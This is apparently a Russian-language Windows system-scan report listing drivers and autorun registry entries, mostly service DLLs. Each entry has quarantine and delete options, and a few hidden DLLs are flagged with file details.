Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC
BDMWrench_x64Не запущенC:\Windows\system32\DRIVERS\BDMWrench_x64.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
  
cpuz134
Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC
cpuz134Не запущенC:\Users\4918~1\AppData\Local\Temp\cpuz134\cpuz134_x64.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
  
FairplayKD
Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC
FairplayKDНе запущенC:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
  
VGPU
Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC
VGPUНе запущенC:\Windows\system32\drivers\rdvgkmd.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
  
Обнаружено - 268, опознано как безопасные - 247

Автозапуск

Имя файлаСтатусМетод запускаОписание
C:\Program Files (x86)\Genie Soft\Genie Cleaner\GenieFloater.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, GenieFloater
Удалить
C:\Windows\System32\win32k.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, System\CurrentControlSet\Control\Session Manager\SubSystems, Kmode
C:\Windows\system32\psxss.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, System\CurrentControlSet\Control\Session Manager\SubSystems, Posix
C:\Windows\system32\sdclt.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\BackupPath,
C:\Windows\System32\aelupsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\AeLookupSvc\Parameters, ServiceDll
Удалить
C:\Windows\System32\appidsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\AppIDSvc\Parameters, ServiceDll
Удалить
C:\Windows\System32\appinfo.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Appinfo\Parameters, ServiceDll
Удалить
C:\Windows\System32\Audiosrv.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\AudioEndpointBuilder\Parameters, ServiceDll
Удалить
C:\Windows\System32\Audiosrv.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\AudioSrv\Parameters, ServiceDll
Удалить
C:\Windows\System32\AxInstSV.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\AxInstSV\Parameters, ServiceDll
Удалить
C:\Windows\System32\bdesvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\BDESVC\Parameters, ServiceDll
Удалить
C:\Windows\System32\bfe.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\BFE\Parameters, ServiceDll
Удалить
C:\Windows\System32\qmgr.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\BITS\Parameters, ServiceDll
Удалить
C:\Windows\System32\browser.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Browser\Parameters, ServiceDll
Удалить
C:\Windows\system32\bthserv.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\bthserv\Parameters, ServiceDll
Удалить
C:\Windows\System32\certprop.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\CertPropSvc\Parameters, ServiceDll
Удалить
C:\Windows\System32\cscsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\CscService\Parameters, ServiceDll
Удалить
C:\Windows\System32\d3dadapter.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\d3dadapter\Parameters, ServiceDll
Удалить
C:\Windows\system32\rpcss.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\DcomLaunch\Parameters, ServiceDll
Удалить
C:\Windows\System32\defragsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\defragsvc\Parameters, ServiceDll
Удалить
C:\Windows\System32\dnsrslvr.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Dnscache\Parameters, ServiceDll
Удалить
C:\Windows\System32\dot3svc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\dot3svc\Parameters, ServiceDll
Удалить
C:\Windows\system32\dps.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\DPS\Parameters, ServiceDll
Удалить
C:\Windows\System32\eapsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\EapHost\Parameters, ServiceDll
Удалить
C:\Windows\system32\fdPHost.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\fdPHost\Parameters, ServiceDll
Удалить
C:\Windows\system32\fdrespub.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\FDResPub\Parameters, ServiceDll
Удалить
C:\Windows\system32\FntCache.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\FontCache\Parameters, ServiceDll
Удалить
C:\Windows\System32\gpsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\gpsvc\Parameters, ServiceDll
Удалить
C:\Windows\system32\kmsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\hkmsvc\Parameters, ServiceDll
Удалить
C:\Windows\system32\ListSvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\HomeGroupListener\Parameters, ServiceDll
Удалить
C:\Windows\System32\ihctrl32.dll
216.00 кб, rsAh, создан: 02.01.2014 00:48:42, изменен: 02.08.2013 07:50:41
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\ihctrl32\Parameters, ServiceDll
Удалить
C:\Windows\System32\ikeext.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\IKEEXT\Parameters, ServiceDll
Удалить
C:\Windows\system32\ipbusenum.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\IPBusEnum\Parameters, ServiceDll
Удалить
C:\Windows\System32\iphlpsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\iphlpsvc\Parameters, ServiceDll
Удалить
C:\Windows\System32\ir16_32.dll
329.53 кб, rsAh, создан: 02.01.2014 00:48:42, изменен: 02.08.2013 07:50:41
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\ir16_32\Parameters, ServiceDll
Удалить
C:\Windows\system32\msdtckrm.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\KtmRm\Parameters, ServiceDll
Удалить
C:\Windows\system32\srvsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters, ServiceDll
Удалить
C:\Windows\System32\wkssvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters, ServiceDll
Удалить
C:\Windows\System32\lltdsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\lltdsvc\Parameters, ServiceDll
Удалить
C:\Windows\System32\lmhsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\lmhosts\Parameters, ServiceDll
Удалить
C:\Windows\system32\Mcx2Svc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Mcx2Svc\Parameters, ServiceDll
Удалить
C:\Windows\system32\mmcss.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\MMCSS\Parameters, ServiceDll
Удалить
C:\Windows\system32\mpssvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\MpsSvc\Parameters, ServiceDll
Удалить
C:\Windows\system32\iscsiexe.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\MSiSCSI\Parameters, ServiceDll
Удалить
C:\Windows\system32\qagentRT.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\napagent\Parameters, ServiceDll
Удалить
C:\Windows\System32\netman.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Netman\Parameters, ServiceDll
Удалить
C:\Windows\System32\nlasvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\NlaSvc\Parameters, ServiceDll
Удалить
C:\Windows\system32\nsisvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\nsi\Parameters, ServiceDll
Удалить
C:\Windows\system32\pnrpsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\p2pimsvc\Parameters, ServiceDll
Удалить
C:\Windows\system32\p2psvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\p2psvc\Parameters, ServiceDll
Удалить
C:\Windows\System32\pcasvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\PcaSvc\Parameters, ServiceDll
Удалить
C:\Windows\system32\peerdistsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\PeerDistSvc\Parameters, ServiceDll
Удалить
C:\Windows\system32\umpnpmgr.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\PlugPlay\Parameters, ServiceDll
Удалить
C:\Windows\system32\pnrpauto.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\PNRPAutoReg\Parameters, ServiceDll
Удалить
C:\Windows\system32\pnrpsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\PNRPsvc\Parameters, ServiceDll
Удалить
C:\Windows\System32\ipsecsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\PolicyAgent\Parameters, ServiceDll
Удалить
C:\Windows\system32\umpo.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Power\Parameters, ServiceDll
Удалить
C:\Windows\system32\profsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\ProfSvc\Parameters, ServiceDll
Удалить
C:\Windows\System32\rasauto.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\RasAuto\Parameters, ServiceDll
Удалить
C:\Windows\System32\rasmans.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\RasMan\Parameters, ServiceDll
Удалить
C:\Windows\system32\regsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\RemoteRegistry\Parameters, ServiceDll
Удалить
C:\Windows\System32\RpcEpMap.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\RpcEptMapper\Parameters, ServiceDll
Удалить
C:\Windows\system32\rpcss.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\RpcSs\Parameters, ServiceDll
Удалить
C:\Windows\System32\SCardSvr.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\SCardSvr\Parameters, ServiceDll
Удалить
C:\Windows\system32\schedsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Schedule\Parameters, ServiceDll
Удалить
C:\Windows\System32\certprop.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\SCPolicySvc\Parameters, ServiceDll
Удалить
C:\Windows\System32\SDRSVC.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\SDRSVC\Parameters, ServiceDll
Удалить
C:\Windows\system32\seclogon.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\seclogon\Parameters, ServiceDll
Удалить
C:\Windows\system32\sensrsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\SensrSvc\Parameters, ServiceDll
Удалить
C:\Windows\System32\ipnathlp.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters, ServiceDll
Удалить
C:\Windows\system32\sppuinotify.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\sppuinotify\Parameters, ServiceDll
Удалить
C:\Windows\System32\ssdpsrv.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\SSDPSRV\Parameters, ServiceDll
Удалить
C:\Windows\system32\sstpsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\SstpSvc\Parameters, ServiceDll
Удалить
C:\Windows\System32\wiaservc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\stisvc\Parameters, ServiceDll
Удалить
C:\Windows\System32\swprv.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\swprv\Parameters, ServiceDll
Удалить
C:\Windows\system32\sysmain.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\SysMain\Parameters, ServiceDll
Удалить
C:\Windows\System32\TabSvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\TabletInputService\Parameters, ServiceDll
Удалить
C:\Windows\System32\tbssvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\TBS\Parameters, ServiceDll
Удалить
C:\Windows\System32\termsrv.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\TermService\Parameters, ServiceDll
Удалить
C:\Windows\system32\themeservice.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Themes\Parameters, ServiceDll
Удалить
C:\Windows\system32\mmcss.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\THREADORDER\Parameters, ServiceDll
Удалить
C:\Windows\System32\trkwks.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\TrkWks\Parameters, ServiceDll
Удалить
C:\Windows\System32\umrdp.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\UmRdpService\Parameters, ServiceDll
Удалить
C:\Windows\System32\uxsms.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\UxSms\Parameters, ServiceDll
Удалить
C:\Windows\system32\w32time.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\W32Time\Parameters, ServiceDll
Удалить
C:\Windows\System32\wbiosrvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\WbioSrvc\Parameters, ServiceDll
Удалить
C:\Windows\system32\wecsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Wecsvc\Parameters, ServiceDll
Удалить
C:\Windows\System32\wercplsupport.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\wercplsupport\Parameters, ServiceDll
Удалить
C:\Windows\System32\WerSvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\WerSvc\Parameters, ServiceDll
Удалить
C:\Windows\system32\wbem\WMIsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Winmgmt\Parameters, ServiceDll
Удалить
C:\Windows\System32\wlansvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Wlansvc\Parameters, ServiceDll
Удалить
C:\Windows\system32\wpdbusenum.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\WPDBusEnum\Parameters, ServiceDll
Удалить
C:\Windows\System32\wsaudio.dll
358.50 кб, rsAh, создан: 02.01.2014 00:48:42, изменен: 02.08.2013 07:50:41
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\wsaudio\Parameters, ServiceDll
Удалить
C:\Windows\System32\wscsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\wscsvc\Parameters, ServiceDll
Удалить
C:\Windows\system32\wuaueng.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\wuauserv\Parameters, ServiceDll
Удалить
C:\Windows\System32\WUDFSvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\wudfsvc\Parameters, ServiceDll
Удалить
C:\Windows\System32\wwansvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\WwanSvc\Parameters, ServiceDll
Удалить
C:\Windows\system32\sysmain.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
АктивенКлюч реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\rdyboost\Performance, Library
Удалить
C:\Windows\System32\wersvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Application Hang, EventMessageFile
C:\Windows\System32\drivers\ati2erec.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\ATIeRecord, EventMessageFile
C:\Windows\system32\dwm.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Desktop Window Manager, EventMessageFile
C:\Program Files (x86)\DVD
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Dvd Maker, EventMessageFile
Maker\DVDMaker.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Dvd Maker, EventMessageFile
C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\IPSEventLogMsg.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Handwriting Recognition, EventMessageFile
C:\Windows\System32\UI0Detect.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Interactive Services detection, EventMessageFile
C:\ProgramData\MailU
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\mailUpdate, EventMessageFile
C:\Windows\system32\fxsevent.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Microsoft Fax, EventMessageFile
C:\Windows\System32\AxInstSv.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Microsoft-Windows-AxInstallService, EventMessageFile
C:\Windows\system32\BlbEvents.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Microsoft-Windows-Backup, EventMessageFile
C:\Windows\system32\defragsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Microsoft-Windows-Defrag, EventMessageFile
C:\Windows\system32\eapsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Microsoft-Windows-EapHost, EventMessageFile
C:\Windows\system32\wecsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Microsoft-Windows-EventCollector, EventMessageFile
C:\Windows\System32\MsSpellCheckingFacility.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Microsoft-Windows-Spell-Checking, EventMessageFile
C:\Windows\System32\MsSpellCheckingFacility.dll
ошибка получения информации о файле
